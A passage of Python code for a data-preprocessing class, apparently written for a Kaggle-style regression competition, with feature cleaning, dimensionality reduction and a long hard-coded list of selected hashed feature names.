to be overidden if required self.normalize = False self.use_aggregates = False self.reduce_dim_nb = 0 self.reduce_dim_method = 'svd' self.scaler = MaxAbsScaler(copy=False) # Load datasets self.train_df = load_df_from_path(self.train_path) # self.train_df[self.train_df == 1563411.76] = 0 if test_path is not None: self.test_df = load_df_from_path(self.test_path) else: self.test_df = None # If joint_dfs, all dfs are joint in a single joint_df if join_dfs: self.joint_df = pd.concat([self.train_df, self.test_df], axis=0) # Create aggregates dfs self.train_agg = 
pd.DataFrame(index=self.train_df.index) if test_path is not None: self.test_agg = pd.DataFrame(index=self.test_df.index) def remove_fillers_from_data(self, dataset='both', n_fillers=47): '''Substitute filler values in dataset for 0''' fillers = find_fillers(self.train_df)[:n_fillers] print(fillers) target = self.train_df['target'] for filler in fillers: if dataset == 'test' or dataset == 'both': self.test_df[self.test_df == filler] = 0 if dataset == 'train' or dataset == 'both': self.train_df[self.train_df == filler] = 0 self.train_df['target'] = target def get_train_data(self, logloss=True, round_targets=False, normalize=False, n_components=None, reduce_dim_nb=0, use_aggregates=True, get_leaky_data=None, reduce_dim_method='svd'): '''Convert train_df to train array''' # Save settings to proccess test data later on self.normalize = normalize self.reduce_dim_nb = reduce_dim_nb self.reduce_dim_method = reduce_dim_method self.use_aggregates = use_aggregates # Get trainning data and labels from dataframe x = self.train_df.drop(["target"], axis=1).values if logloss: y = np.log1p(self.train_df["target"].values) else: y = self.train_df["target"].values if round_targets: y = np.around(y, decimals=round_targets) # Preprocess if required if normalize: x = self.normalize_data(x, fit=True, verbose=self.verbose) if reduce_dim_nb or n_components is not None: x = self.reduce_dimensionality('train', n_components=n_components, red_num=reduce_dim_nb, method=reduce_dim_method, verbose=self.verbose) # Compute aggregates if required if use_aggregates: x = np.concatenate([x, self.train_agg.values], axis=-1) # Get leaky rows for training if get_leaky_data is not None: x_lk, y_lk = self.get_validation_set_from_leaky_test( get_leaky_data, logloss=logloss) x = np.concatenate([x, x_lk], axis=0) y = np.concatenate([y, y_lk], axis=0) return x, y def get_test_data(self): '''Convert test_df to array using the same preprocess as trainning data''' x = self.test_df.values # Preprocess if required if 
self.normalize: x = self.normalize_data(x, fit=False, verbose=self.verbose) if self.reduce_dim_nb: x = self.reduce_dimensionality('test', self.reduce_dim_nb, method=self.reduce_dim_method, fit=False, verbose=self.verbose) # Compute aggregates if required if self.use_aggregates: x = np.concatenate([x, self.test_agg.values], axis=-1) return x def get_aggregates_as_data(self, dataset, logloss=True, round_targets=False): '''Get aggregates as np data''' if dataset == 'train': x = self.train_agg.values if logloss: y = np.log1p(self.train_df["target"].values) else: y = self.train_df["target"].values if round_targets: y = np.around(y, decimals=round_targets) return x, y elif dataset == 'test': x = self.test_agg.values return x def remove_constant_features(self, verbose=True): '''Remove features that are constant for all train set entries''' col_list = [] count = 0 for col in self.train_df.columns: if col != 'ID' and col != 'target': if self.train_df[col].std() == 0: col_list.append(col) count += 1 # Remove feature in both train and test sets self.train_df.drop(col_list, axis=1, inplace=True) if self.test_df is not None: self.test_df.drop(col_list, axis=1, inplace=True) if verbose: print('{} constant features removed from datasets'.format(count)) def remove_duplicated_features(self, verbose=True): '''Remove features that have duplicated values''' colsToRemove = [] columns = self.train_df.columns for i in range(len(columns) - 1): v = self.train_df[columns[i]].values for j in range(i + 1, len(columns)): if np.array_equal(v, self.train_df[columns[j]].values): colsToRemove.append(columns[j]) # Remove feature in both train and test sets self.train_df.drop(colsToRemove, axis=1, inplace=True) if self.test_df is not None: self.test_df.drop(colsToRemove, axis=1, inplace=True) if verbose: print('{} duplicated features removed from datasets'.format( len(colsToRemove))) def remove_different_distribution_features(self, pvalue_threshold=0.01, stat_threshold=0.2, verbose=True): '''Remove 
features that have different distribuition in train and test sets''' diff_cols = [] for col in self.train_df.drop(["target"], axis=1).columns: statistic, pvalue = ks_2samp( self.train_df[col].values, self.test_df[col].values) if pvalue <= pvalue_threshold and \ np.abs(statistic) > stat_threshold: diff_cols.append(col) for col in diff_cols: if col in self.train_df.columns: self.train_df.drop(col, axis=1, inplace=True) self.test_df.drop(col, axis=1, inplace=True) if verbose: print('{} features removed.'.format(len(diff_cols))) def keep_only_selected_features(self, dataset='both', return_only=False): '''Remove all columns except for the hand picked ones''' features = ['f190486d6', '58e2e02e6', 'eeb9cd3aa', '9fd594eec', '6eef030c1', '15ace8c9f', 'fb0f5dbfe', '58e056e12', '20aa07010', '024c577b9', 'd6bb78916', 'b43a7cfd5', '58232a6fb', '1702b5bf0', '324921c7b', '62e59a501', '2ec5b290f', '241f0f867', 'fb49e4212', '66ace2992', 'f74e8f13d', '5c6487af1', '963a49cdc', '26fc93eb7', '1931ccfdd', '703885424', '70feb1494', '491b9ee45', '23310aa6f', 'e176a204a', '6619d81fc', '1db387535', 'fc99f9426', '91f701ba2', '0572565c2', '190db8488', 'adb64ff71', 'c47340d97', 'c5a231d81', '0ff32eb98', '06148867b', '4ec3bfda8', 'a9ca6c2f4', 'bb0408d98', '1010d7174', 'f8a437c00', '74a7b9e4a', 'cfd55f2b6', '632fed345', '518b5da24', '60a5b79e4', '3fa0b1c53', 'e769ee40d', '9f5f58e61', '83e3e2e60', '77fa93749', '3c9db4778', '42ed6824a', '761b8e0ec', 'ee7fb1067', '71f5ab59f', '177993dc6', '07df9f30c', 'b1c5346c4', '9a5cd5171', 'b5df42e10', 'c91a4f722', 'd93058147', '20a325694', 'f5e0f4a16', '5edd220bc', 'c901e7df1', 'b02dfb243', 'bca395b73', '1791b43b0', 'f04f0582d', 'e585cbf20', '03055cc36', 'd7f15a3ad', 'ccd9fc164', '0d7692145', '62071f7bc', 'ab515bdeb', 'c30c6c467', 'eab76d815', 'b6ee6dae6', '49063a8ed', '4cb2946ce', '6c27de664', '772288e75', 'afd87035a', '44f2f419e', '754ace754', 'e803a2db0', 'c70f77ef2', '65119177e', '3a66c353a', '4c7768bff', '9e4765450', '24141fd90', 'dc8b7d0a8', 'ba499c6d9', 
'8b1379b36', '5a3e3608f', '3be3c049e', 'a0a3c0f1b', '4d2ca4d52', '457bd191d', '6620268ab', '9ad654461', '1a1962b67', '7f55b577c', '989d6e0f5', 'bc937f79a', 'e059a8594', '3b74ac37b', '555265925', 'aa37f9855', '32c8b9100', 'e71a0278c', '0f8d7b98e', 'c30ff7f31', 'ac0e2ebd0', '24b2da056', 'bd308fe52', '476d95ef1', '202acf9bd', 'dbc0c19ec', '06be6c2bb', 'd8296080a', 'f977e99dc', '2191d0a24', '7db1be063', '1bc285a83', '9a3a1d59b', 'c4d657c5b', 'a029667de', '21bd61954', '16bf5a9a2', '0e0f8504b', '5910a3154', 'ba852cc7a', '685059fcd', '21d6a4979', '78947b2ad', '1435ecf6b', '3839f8553', 'e9b5b8919', 'fa1dd6e8c', '632586103', 'f016fd549', 'c25ea08ba', '7da54106c', 'b612f9b7e', 'e7c0a50e8', '29181e29a', '395dbfdac', '1beb0ce65', '04dc93c58', '733b3dc47', '1847c8140', '4adae02ea', '06f44eb79', '63dfd4552', '2a1f6c7f9', 'b3655056c', '7a5460b56', '8909db7d5', 'b0e2acd8e', '7cb53a29a', '5d5c5ce6d', 'a5874086d', '281c556a6', '04fe69e6a', 'e421c414e', '87e6b35f2', '1de239e78', 'c65451871', 'b136976cc', 'baa676f41', '82f194d54', 'f3b9c0b95', '2a83c3267', '802ee804e', '99b88d0fd', 'a257e4bb9', '741684fb0', 'fae0ce474', '16d7bff2b', '0d6d7ec0b', 'bdadd6c34', 'b6623bacf', 'a77b4afa4', '03490ef8c', 'f0aec6c6b', '7b6e769e4', 'ce6349807', '1602cb35d', '279d380ce', '63895c382', '18cad608c', '05f1b68b8', '9e0c57b34', '414b74eaa', '3b6f67b0e', '372daeab0', 'ec827621a', '44d132265', '850d3a6f5', '440d789c5', 'e9c45d66f', '615cc4c17', 'ca04a07ca', '4685cc47b', '6cf9184bb', '3dc46e323', '0106dd950', '3855aef1e', 'c9eda7d9c', 'ac308c9a3', '964cd68bc', 'f23b7530c', '7250feb72', '6809065b9', 'c7fd9abc6', '06a1c3b47', '39896d3dd', '10f17bd3e', '6984f4045', 'ed8ff54b5', '42b407f0d', '5509e2e98', 'c593d73e8', 'd3245937e', 'cbeddb751', '0f81cc1d2', '22b3971f5', 'ff3ebf76b', '76a75bd91', '258412544', '1ad24da13', '8c5025c23', 'f52a82e7f', 'c0b22b847', 'd75793f21', '4cffe31c7', '6c2d09fb1', 'fb42abc0d', '206ba1242', '62f61f246', '1389b944a', 'd15e80536', 'fa5044e9e', 'a0b0a7dbf', '1ff6be905', 
'4e06c5c6d', '1835531cd', '68b647452', 'c108dbb04', '58e8e2c82', 'f3bfa96d5', 'f2db09ac3', '4e8196700', '8cd9be80e', '83fc7f74c', 'dbc48d37c', '2028e022d', '17e160597', 'eb8cbd733', 'addb3f3eb', '460744630', '9108ee25c', 'b7950e538', 'a7da4f282', '7f0d863ba', 'b7492e4eb', '24c41bd80', 'fd7b0fc29', '621f71db3', '26f222d6d', '1d9078f84', '64e483341', 'a75d400b8', '4fe8154c8', '29ab304b9', '20604ed8f', 'bd8f989f1', 'c1b9f4e76', '4824c1e90', '4ead853dc', 'b599b0064', 'd26279f1a', '58ed8fb53', 'ff65215db', '402bb0761', '74d7998d4', 'c7775aabf', '9884166a7', 'beb7f98fd', 'fd99c18b5', 'd83a2b684', '18c35d2ea', '0c8063d63', '400e9303d', 'c976a87ad', '8a088af55', '5f341a818', '5dca793da', 'db147ffca', '762cbd0ab', 'fb5a3097e', '8c0a1fa32', '01005e5de', '47cd6e6e4', 'f58fb412c', 'a1db86e3b', '50e4f96cf', 'f514fdb2e', '7a7da3079', 'bb1113dbb', '20868afc1', 'a46587cda', 'acdef5318', 'a72fcabd8', '21216a0a8', 'dd16bb1ff', '3b8208d28', 'a8c320153', '4a6f8b2c1', 'ac2392a17', '08565b519', '6035df6d8', '4b2316bd5', 'bc3f77679', '51ebff825', '43727fb35', 'c0d363088', 'fd1187d68', '207871d87', '7e0fd6d92', 'f4e243e21', '037a54e89', 'cfa24e4be', 'd7f1f9e52', '6760927a0', '0d8f892fe', '09e395f05', 'bcc18dd40', '0f5fb7fe7', 'f10717d56', '717039eef', '41fb39de4', '965fa6747', '75e55b7a9', 'ff08cfbbe', '9e88cfd02', 'df3ac443c', '7acda93e6', '62e587225', 'd313c892b', '2135fa05a', 'e8a3423d6', '90a438099', '7ad6b38bd', '60e45b5ee', '2b9b1b4e2', 'd6c82cd68', '923114217', 'b361f589e', '04be96845', 'ee0b53f05', '21467a773', '47665e3ce', 'a6229abfb', '9666bfe76', '7dcc40cda', '17be6c4e7', 'a89ab46bb', '9653c119c', 'cc01687d0', '60e9cc05b', 'ffcec956f', '51c250e53', '7344de401', 'a15b2f707', 'a8e607456', 'dbb8e3055', '2a933bcb8', 'b77bc4dac', '58d9f565a', '17068424d', '7453eb289', '027a2206a', '343042ed9', 'c8fb3c2d8', '29eddc376', '1c873e4a6', '588106548', '282cfe2ad', '358dc07d0', '266525925', '4b6dfc880', '2cff4bf0c', 'a3382e205', '6488c8200', '547d3135b', 'b46191036', '453128993', 
'2599a7eb7', '2fc60d4d9', '009319104', 'de14e7687', 'aa31dd768', '2b54cddfd', 'a67d02050', '37aab1168', '939cc02f5', '31f72667c', '6f951302c', '54723be01', '4681de4fd', '8bd53906a', '435f27009', 'f82167572', 'd428161d9', '9015ac21d', 'ec4dc7883', '22c7b00ef', 'd4cc42c3d', '1351bf96e', '1e8801477', 'b7d59d3b5', 'a459b5f7d', '580f5ff06', '39b3c553a', '1eec37deb', '692c44993', 'ce8ce671e', '88ef1d9a8', 'bf042d928', '2d60e2f7a', '11ad148bd', '54d3e247f', 'c25438f10', 'e6efe84eb', '964037597', '0196d5172', '47a8de42e', '6f460d92f', '0656586a4', '22eb11620', 'c3825b569', '6aa919e2e', '086328cc6', '9a33c5c8a', 'f9c3438ef', 'c09edaf01', '85da130e3', '2f09a1edb', '76d34bbee', '04466547a', '3b52c73f5', '1cfb3f891', '704d68890', 'f45dd927f', 'aba01a001', 'c9160c30b', '6a34d32d6', '3e3438f04', '038cca913', '504c22218', '56c679323', '002d634dc', '1938873fd', 'd37030d36', '162989a6d', 'e4dbe4822', 'ad13147bd', '4f45e06b3', 'ba480f343', '32313055b', '1cec80910', 'd5de50af2', 'd08c4204c', 'dbf75ea9f', 'b93c33953', '425c08bf3', '015c3e354', '26419fa97', '0b9a18ebf', 'bbd7e6282', '6fec5a793', 'e4eac6fc5', '99ea04b86', '24292d615', '72ad5471c', '2f489369f', '35d9497eb', '42d321127', '48aa6d627', '94516b63e', '55d7eb6d2', '8dbd95b8d', '1d2df346e', '181e91b1c', '4a29bc92b', '0f14ab429', '22b3a9853', 'defcc2c50', '6a9e2b09d', '42b795e64', 'b65627fab', '7af2b8f44', '1ce5f7bde', 'dd2fc85d7', '013127235', '916d17652', 'a697e9248', '24addf864', 'a63aaf7cc', '3391c0af1', 'd8e951a15', '320c3880a', '37bd241bb', 'ef6fab1bc', '39d765b49', 'c0f2800fc', '9401c82a9', '6f9d256a9', 'f967f827b', '798a8e92e', '1e991f09b', '77854931e', '0024cd760', 'ab7b12083', '7b8ac394f', 'd8aa77bcc', '54b3d6afc', '4c6a1accd', '0a7ef2f9b', 'dc3b4460b', '83ce5d80d', '7e293fbaf', '8d468092c', 'dc0118d47', '9f8df01bd', '3f02111a8', 'bf0195c11', '28bc37378', '05410a84f', 'ecdc88e4b', '8d9263a24', '3391c0af1', 'd8e951a15', '320c3880a', '37bd241bb', 'ef6fab1bc', '39d765b49', 'c0f2800fc', '9401c82a9', '6f9d256a9', 
'f967f827b', '798a8e92e', '1e991f09b', '77854931e', '0024cd760', 'ab7b12083', '7b8ac394f', 'd8aa77bcc', '54b3d6afc', '4c6a1accd', '0a7ef2f9b', 'dc3b4460b', '83ce5d80d', '7e293fbaf', '8d468092c', 'dc0118d47', '9f8df01bd', '3f02111a8', 'bf0195c11', '28bc37378', '05410a84f', 'ecdc88e4b', '8d9263a24', 'e234cdc9b', '380d54fad', '7f17e0b2a', '03e726456', '8f66157e3', '556fb6bc0', '2d2114d9b', '215ffb087', '3b843ae7e', 'c8438b12d', 'd1b9fc443', '19a45192a', '63509764f', '6b6cd5719', 'b219e3635', '4b1d463d7', '4baa9ff99', 'b0868a049', '3e3ea106e', '043e4971a', 'a2e5adf89', '25e2bcb45', '3ac0589c3', '413bbe772', 'e23508558', 'c1543c985', '2dfea2ff3', '9dcdc2e63', '1f1f641f1', '75795ea0a', 'dff08f7d5', '914d2a395', '00302fe51', 'c0032d792', '9d709da93', 'cb72c1f0b', '5cf7ac69f', '6b1da7278', '47b5abbd6', '26163ffe1', '902c5cd15', '45bc3b302', '5c208a931', 'e88913510', 'e1d6a5347', '38ec5d3bb', 'e3d64fcd7', '199d30938', '4302b67ec', '75b663d7d', 'fc4a873e0', '1e9bdf471', '86875d9b0', '8f76eb6e5', '3d71c02f0', '05c9b6799', '26df61cc3', '27a7cc0ca', '9ff21281c', '3ce93a21b', '9f85ae566', '3eefaafea', 'afe8cb696', '72f9c4f40', 'be4729cb7', '8c94b6675', 'ae806420c', '63f493dba', '5374a601b', '5291be544', 'acff85649', '3690f6c26', '26c68cede', '12a00890f', 'dd84964c8', 'a208e54c7', 'fb06e8833', '7de39a7eb', '5fe3acd24', 'e53805953', '3de2a9e0d', '2954498ae', '6c3d38537', '86323e98a', 'b719c867c', '1f8a823f2', '9cc5d1d8f', 'd3fbad629', '44df9c106', 'c768b2fbd', 'ca667c723', '1a9b9e2fe', 'e3a41c199', '1529e64f6', '2af3668d1', '85505df26', 'b488b6a67', '4e593c1c5', '47aab5d12', 'b0c596a35', '2127bb611', 'c8c4ef2e5', '665493ecc', '235163358', '932d0f56b', '9ce50845b', 'aca96197c', '74fa547c6', 'b6636b458', '95bbebdd4', 'de0aaf6f4', '7106396d7', 'fb2ab1513', '346c04a64', '5271beb00', 'e8b599c85', 'de5e5b296', '90e069c70', 'a939664aa', 'e8f43b3ab', 'df5f5272a', 'df3cf10bd', '71659d45d', '03b8b1f2d', '860a95ef6', '7f174450b', 'bbbff9657', '1d9b78b9c', '4569d5378', '22f05c895', 
'5fad07863', 'f32763afc', '9bb02469c', '61063fa1c', '4a93ad962', 'fa1efdadd', '4ef309fc3', 'ed0860a34', '6ae0787f3', 'ffd50f0bf', '704e2dc55', '1b1a893f5', 'b19e65a65', '8d4b52f9a', '85dcc913d', '92ba988e1', '6d46740f1', '0aab2f918', '6610f90f1', 'a235f5488', 'c5c073bb0', '13f7f9c70', 'fb6da0420', '73361d959', '783ee6e9a', '635fbbd2c', '60cd556c9', '150504397', 'f3b6dabf7', 'd92ea0b2a', 'b904b8345', '78bc2558b', '4e1a8f6eb', 'c89ae4ce0', 'f2af9300f', 'ca25aad9f', '9d435a85b', '8d035d41e', '48b839509', '2b8851e90', '28f75e1a5', '0e3ef9e8f', '37ac53919', '7ca10e94b', '4b6c549b1', '467aa29ce', '74c5d55dc', '0700acbe1', '44f3640e4', 'e431708ff', '097836097', 'd1fd0b9c2', 'a0453715a', '9e3aea49a', '899dbe405', '525635722', '87a2d8324', 'faf024fa9', 'd421e03fd', '1254b628a', 'a19b05919', '34a4338bc', '08e89cc54', 'a29c9f491', 'a0a8005ca', '62ea662e7', '5fe6867a4', '8b710e161', '7ab926448', 'd04e16aed', '4e5da0e96', 'ff2c9aa8f', 'b625fe55a', '7124d86d9', '215c4d496', 'b6fa5a5fd', '55a7e0643', '0a26a3cfe', '5030aed26', 'b850c3e18', '212efda42', '9e7c6b515', '2d065b147', '49ca7ff2e', '37c85a274', 'ea5ed6ff7', 'deabe0f4c', 'bae4f747c', 'ca96df1db', '05b0f3e9a', 'eb19e8d63', '235b8beac', '85fe78c6c', 'cc507de6c', 'e0bb9cf0b', '80b14398e', '9ca0eee11', '4933f2e67', 'fe33df1c4', 'e03733f56', '1d00f511a', 'e62cdafcf', '3aad48cda', 'd36ded502', '92b13ebba', 'f30ee55dd', '1f8754c4e', 'db043a30f', 'e75cfcc64', '5d8a55e6d', '6e29e9500', 'c5aa7c575', 'c2cabb902', 'd251ee3b4', '73700eaa4', '8ab6f5695', '54b1c1bc0', 'cbd0256fb', '50603ae3d', '48282f315', '090dfb7e2', '6ccaaf2d7', '1bf2dfd4a', '50b1dd40f', '1604c0735', 'e94c03517', 'f9378f7ef', '65266ad22', 'ac61229b6', 'f5723deba', '1ced7f0b4', 'b9a4f06cd', '8132d18b8', 'df28ac53d', 'ae825156f', '936dc3bc4', '5b233cf72', '95a2e29fc', '882a3da34', '2cb4d123e', '0e1921717', 'c83d6b24d', '90a2428a5', '67e6c62b9', '320931ca8', '900045349', 'bf89fac56', 'da3b0b5bb', 'f06078487', '56896bb36', 'a79522786', '71c2f04c9', '1af96abeb', 
'4b1a994cc', 'dee843499', '645b47cde', 'a8e15505d', 'cc9c2fc87', '509e911f0', '9c36a77b3', '50aaba7f1', 'ed5af35f0', 'ffd2f9409', 'd6a122efd', '30768bc79', '9161061c9', '1fbbd4edf', '9a179ed71', '6a055c4fb', '61efa1e29', 'e171bccbe', 'd7cdd8aef', 'd168174c7', 'b791ce9aa', '1a82869a6', '3696a15a7', '7b31055f1', 'a76ad8513', '82ba7a053', '37426563f', 'ba5bbaffc', 'd3022e2f1', '0ccd5ff1c', '31a3f920c', '86eb6ec85', '38df6c628', 'f1fbe249b', '6d0d72180', '22dbe574a', '5860d7fa9', '455f29419', 'f269ec9c8', '75aad4520', '18c0b76e9', 'dae4d14b4', '0cad4d7af', '1e1cb47f3', '9d6410ef5', '51c141e64', '0e348d340', '64e010722', '55a763d90', '13b54db14', '01fdd93d3', '1ec48dbe9', 'cf3841208', 'd208491c8', '90b0ed912', '633e0d42e', '9236f7b22', '0824edecb', '71deb9468', '1b55f7f4d', '377a76530', 'c47821260', 'bf45d326d', '69f20fee2', 'd6d63dd07', '5ab3be3e1', '93a31829f', '121d8697e', 'f308f8d9d', '0e44d3981', 'ecdef52b2', 'c69492ae6', '58939b6cc', '3132de0a3', 'a175a9aa4', '7166e3770', 'abbde281d', '23bedadb2', 'd4029c010', 'fd99222ee', 'bd16de4ba', 'fb32c00dc', '12336717c', '2ea42a33b', '50108b5b5', '53aa182a2', '4e92107c6', '295408598', 'b76bf3f19', '3305c8063', 'd3a116347', 'ac5260727', '199caef5d', '97ea72529', '1d4d5cd4a', '8fc7efaf0', '225fa9d61', '94f3dcaee', '4634c8fae', '660fdbc58', '052f633c1', '657dec16b', '7fa5bc19f', '7207afb67', 'cda277b2a', 'e9a473fbb', '3eac9a76e', '1c554649c', '86ffb104c', 'b14d5014b', '8348ea8d3', 'e3a4596f9', '49db469f5', 'f928893ca', 'aa610feec', 'fa2a340da', '652142369', '53aa182a2', '4e92107c6', '295408598', 'b76bf3f19', '3305c8063', 'd3a116347', 'ac5260727', '199caef5d', '97ea72529', '1d4d5cd4a', '8fc7efaf0', '225fa9d61', '94f3dcaee', '4634c8fae', '660fdbc58', '052f633c1', '657dec16b', '7fa5bc19f', '7207afb67', 'cda277b2a', 'e9a473fbb', '3eac9a76e', '1c554649c', '86ffb104c', 'b14d5014b', '8348ea8d3', 'e3a4596f9', '49db469f5', 'f928893ca', 'aa610feec', 'fa2a340da', '652142369', 'f81908ca5', '947c7c3e8', '8160230fd', 'c2d200f0e', 
'c99902a93', 'd3a6362c5', '3ee95e3ef', '7f8027faf', '55e30b08f', '24fef0850', '1ac1a10d6', '29c64fa08', '82e9efdd8', 'befe0f9c4', '4f0d3819a', '849c542c3', '4f325b517', '57e01acca', '54481feaa', '3ebf86dd5', '849c464e7', '248db7ce7', '82c164590', '7fd7c9eae', '9fe78f046', 'e92c373a6', 'abace6b29', 'd6be59f6a', '2d1dd55ed', '9a9b4a012', '0ae364eb9', 'db1b70fc8', '916ac9986', '545d84e13', '049e4daae', '95837bbfb', '9b8eff1d7', '17a6e2978', 'b7ae337fe', '256f1449f', '89a26cda9', '1930cefda', '42451bcbf', '722a0187a', '5a86cabd0', 'e14727834', '21a3176c5', '16bf8b4ec', '5b465f819', 'a2aa0e4e9', '944e05d50', '4f8b27b6b', 'a498f253f', 'c73c31769', '025dea3b3', '616c01612', 'f3316966c', '83ea288de', '2dbeac1de', '47b7b878f', 'b4d41b335', '686d60d8a', '6dcd9e752', '7210546b2', '78edb3f13', '7f9d59cb3', '30992dccd', '26144d11f', 'a970277f9', '0aea1fd67', 'dc528471e', 'd51d10e38', 'efa99ed98', '48420ad48', '7f38dafa6', '1af4ab267', '3a13ed79a', '73445227e', '971631b2d', '57c4c03f6', '7f91dc936', '0784536d6', 'c3c3f66ff', '052a76b0f', 'ffb34b926', '9d4f88c7b', '442b180b6', '948e00a8d', '5bc10886b', '292471107', 'fe919be32', 'b1a7086ac', '88f64cd8b', '00c467392', 'e24e3b26d', '42ebbcafa', 'ee7c4db36', 'b5c9b4e39', 'adc894423', '9ba5eb33d', 'd0631e6c0', 'c611e1778', '2947535d9', 'ef2056ce5', '79af1068d', '098913433', 'dcf8a669f', 'ce0ee5a89', 'f6a05ad95', '831a9e087', '572f63ba5', '8fc5f0637', 'fb36b89d9', '0926408ae', '63688d3df', '9ddb5842c', '2ea3f3caf', '32ebdadbc', '92fd74409', 'b8fde5765', '2c97120d8', '44146018f', '67b44278a', '8afae1db8', 'fd5c6c5aa', 'b04bab75e', '9ee0b383b', '77f5250e3', '5bf913a56', 'e6c050854', 'edc3f10a1', '3607eabff', '5cec9a2fc', '68153d35e', '193b90919', '5bca7197d', 'da2a2f42d', '0f2b86f4a', '280898a2f', '1c6c0ffb1', 'ec2a9147d', '1ba077222', 'f115e74c0', '34b2a678e', 'cc0045289', 'c00356999', '09184c121', '799625b2f', '5b714cd7a', 'd14ac08a8', '5ef415428', 'f51378159', 'd5dcaa04a', 'e8522c145', '7610d0f28', '20ff37b40', '5b9e32dbe', 
'dd84674d0', '587a5d8c3', '2c1ed7d88', '86f0ede14', '05e427fe8', '45226872a', '003da5628', 'fbbd5f5ae', 'a8b6710d0', '99197edf2', 'a1995906f', '63be1f619', '36a56d23e', '9e2040e5b', 'a00a63886', '4edc3388d', '5f11fbe33', '26e998afd', 'f7faf2d9f', '992b5c34d', 'f7f553aea', '7e1c4f651', 'f5538ee5c', '711c20509', '55338de22', '374b83757', 'f41f0eb2f', 'bf10af17e', 'e2979b858', 'd3ed79990', 'fe0c81eff', '5c0df6ac5', '82775fc92', 'f1c20e3ef', 'fa9d6b9e5', 'a8b590c6e', 'b5c4708ad', 'c9aaf844f', 'fe3fe2667', '50a6c6789', '8761d9bb0', 'b6403de0b', '2b6f74f09', '5755fe831', '91ace30bd', '84067cfe0', '15e4e8ee5', 'd01cc5805', '870e70063', '2bd16b689', '8895ea516', '6469d38ef', '22ff4e1b8', 'cf4a89033', '2d7f256c6', 'e98dd91da', 'bce33962d', 'cdaf3e576', '78b2cf944', 'b3dbb1222', 'a2d707f4e', 'a5565ec7d', '26b423c42', '2731a96a2', 'c24634d56', 'dc61677e5', '62c319fd1', 'fbe583de5', 'ab7534e84', '92eb376f1', '7def2d7d3', '657d07d19', 'df08959aa', '48130b04b', 'e0cad27c5', '0b139c060', '99df18cb2', '32c6f9aa6', '7ff7d351b', 'e49fea26e', '403e7e48d', '2c5809e51', 'fe1160758', 'd83991b80', 'ce999e374', '29e58696d', '212226b7b', '950b9cf2d', 'adc70e02f', '7792cebe0', '22f0deffc', '65ee014d6', '5c613c9de', '88263a031', '0e72651fe', 'ed76b9206', '884ec1cca', 'c05e7f369', '736e55e5f', '64d91247f', 'be8a71172', '88204c8b7', '5522157d7', '7b922ea8b', '5d900b8ce', '36af55ef1', 'f3e544d66', '12adc9937', '78a879b5d', '63f291ac1', '3e568d6c3', '1413972fe', '5f6ea2fa9', '46e10e042', '982210169', 'a6e843cff', 'dd80d36d7', 'c5e748f6a', 'c1ad8b95a', '8e7a80f64', '533d88707', '69e1143e2', '2cbced573', '4810efa27', '91d95575e', '55c3e1c4e', 'da1d826f5', '92f32943a', '46291c5d1', '9789dc806', 'b266d28ce', '6cf7644e0', 'c0004231c', '25968f96e', 'fb8395d97', 'ee9e70298', 'e662f1672', 'eda856f5f', '49f11e712', '43dc0f90c', '11d9e8383', '0738fe5ff', '3268914c7', '08d17e384', '1a67a2101', '406a11b5a', 'e2e6f1d23', '2862eec4f', '9c6bf2983', '0a4e510ee', '14d2c6d95', '0a03426de', '82ade3db6', 
'8909b68e1', 'aaed60a3d', '879e1f51a', '5cbf1b3ea', '1ecddbaa0', 'b96718230', 'bd550871c', 'c55eb4392', '0743b9c08', '5580c77b0', '25613ca0a', 'de66047b0', '2322dbbbb', '760ef38f1', 'da5c36eee', '2de811f82', 'a760e7f65', '5d8a2a27d', '6e00fdaad', 'e0f6a993a', '17e2a7989', '38f5efd6d', 'ce3c09a74', 'a6182b737', '1a44834bf', '940151347', 'dee882846', '034bec11b', '11b0ebe2a', '0db69e82d', '2c338b4d6', 'f34f48706', 'ea397d576', 'ca6c23686', '371ff7a11', 'cb162bd89', '2e762ec53', '1d79bc053', '912f4f5de', 'a25bc2d4a', 'c16a7d537', '268040457', '45cda25bb', '506e25985', 'f62b69c09', 'a8ef2a0d2', '67f9e982f', '0f49e0f05', '85f50c67d', 'c959d372a', '89db78d8e', '94f26b213', '13d853d22', '7bf58da23', '3377a30e2', '357a1f6b5', '19f721ba0', '83e2ae51c', '75d240f7b', '376474413', '0892b3439', '4bf2b8e7c', 'f8de3e357', '4d9538272', '50a900e26', 'ca4eab5c5', '8c564ae48', '16a9296fd', '9bed59a71', '683d89bf1', '736fce873', '60b76e463', '6a3b5a968', '890163e1a', '2c136905e', '08d203407', '08af3dd45', 'fbe52b1b2', 'e2b4d4ef7', '78c239acf', '3da2882fd', '10596ddee', '2135da74a', '3e0e55648', 'acee6ff41', '93c1eecb4', 'b6e38a517', 'e9c7ccc05', '2bf7dc91d', '06b19b6c4', 'b0e45a9f7', 'fd206ec4d', 'c63090352', 'df1ed6b50', '28dc3cc44', '7b1ddbabf', '5a88e3d89', 'f2520b601', '7ba58c14d', '1fe02bc17', '4672a8299', '8794c72c8', 'cca45417f', '55dbd6bcb', 'e6e2c3779', '3cae817df', '973663d14', 'e8dfb33d5', '9281abeea', '11c01e052', '1520de553', 'edddb1ba5', 'c18b41ac3', '00e87edf2', 'ae72cba0a', 'eb4f2651e', '300398f1c', '6c05550b8', '9b26736c3', '24744410a', '26faf1b2e', '44f09b92d', '19975f6ff', '1bf6240eb', 'e438105db', 'cdc36a26a', '087e01c14', '828b327a6', 'cc62f0df8', '9370aa48d', 'd4815c074', '18321c252', '22fbf6997', 'feed9d437', 'f6c9661fc', '55f2b3d34', '69fe81b64', '1074273db', '7f72c937f', '79e55ef6c', '408d86ce9', '7a1e99f69', '736513d36', '0f07e3775', 'eb5a2cc20', '2b0fc604a', 'aecd09bf5', '91de54e0a', '66891582e', '20ef8d615', '8d4d84ddc', 'dfde54714', '2be024de7', 
